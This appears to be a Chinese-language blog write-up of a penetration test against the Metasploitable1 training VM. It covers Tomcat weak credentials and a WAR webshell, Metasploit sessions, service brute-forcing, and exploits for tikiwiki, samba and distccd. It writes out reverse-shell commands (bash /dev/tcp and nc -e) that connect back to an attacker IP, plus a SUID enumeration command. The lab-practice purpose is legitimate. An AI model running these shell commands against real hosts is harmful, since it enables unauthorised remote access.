Metasploitable1

信息收集

  1. 端口信息收集

    image-20240429083044342

漏洞

8180-tomcat

  1. 弱密码

    image-20240429084220115

  2. 上传war 包

    image-20240429090637112

    image-20240429090644291

    image-20240429090654787

    image-20240429090736201

    image-20240429090812150

    1
    http://192.168.79.186:8180/cmd/cmd.jsp?cmd=/bin/sh -i >& /dev/tcp/192.168.79.137/19999 0>&1

    发现不行,尝试使用nc 进行反弹shell

    image-20240429091013117

    1
    http://192.168.79.186:8180/cmd/cmd.jsp?cmd=nc -e /bin/bash 192.168.79.137 19999

    image-20240429091000351

  3. 上线msf

    image-20240429094003330

    找了一个路径,上传,发现执行不了

    image-20240429093514848

    image-20240429093640089

    uname -a

    image-20240429094214485

    上传32位

    image-20240429094252729

    image-20240429094340280

    貌似小马拉大马拉不过去

    image-20240429094413515

    理解了handler 的payload 没有改,改了之后就能上线了

    image-20240429094824139

    尝试大马

    大马反而不太行

  4. 尝试提权

    image-20240430004848521

    发现时符合脏牛的范围,但是并不是很想用,会破坏操作系统

    上传一个收集信息的脚本

    image-20240430005730415

    空余时间尝试suid 进行提权

    不出意料完全没有成功

    1
    find / -perm -u=s -type f 2>/dev/null

    结合

    image-20240430005841047

    https://gtfobins.github.io/

21-ftp

尝试爆破

image-20240430185931149

等了一会发现,没有成功

22-ssh

尝试爆破

image-20240430190108139

尝试,发现没有成功

23-telnet

还是先尝试爆破

image-20240430190524251

都不是弱口令

25-smtp

无法利用

53-domain

可以进行dns 劫持

80-tikiwiki

image-20240430190910770

尝试文件路径爆破

image-20240430191202428

image-20240430191240823

发现版本

tikiwiki 1.9.5

image-20240430191716532

发现存在payload

msf 也是存在的

image-20240430191824653

image-20240430192956405

image-20240430193230020

image-20240430193236275

成功连接,但是这个可以发现,必须嗲有参数 -vn

445-samba

尝试使用msf 检测一下

image-20240430194156584

中了

3306-mysql

尝试爆破弱密码

image-20240430195954739

3632-distccd

image-20240430200304111

尝试

https://github.com/k4miyo/CVE-2004-2687

image-20240430200741690

尝试提权

image-20240430201138671

image-20240430201230181

image-20240430201710432

image-20240430201853954


Metasploitable1
https://tsy244.github.io/2024/04/28/靶场记录/Metasploitable1/
Author
August Rosenberg
Posted on
April 28, 2024
Licensed under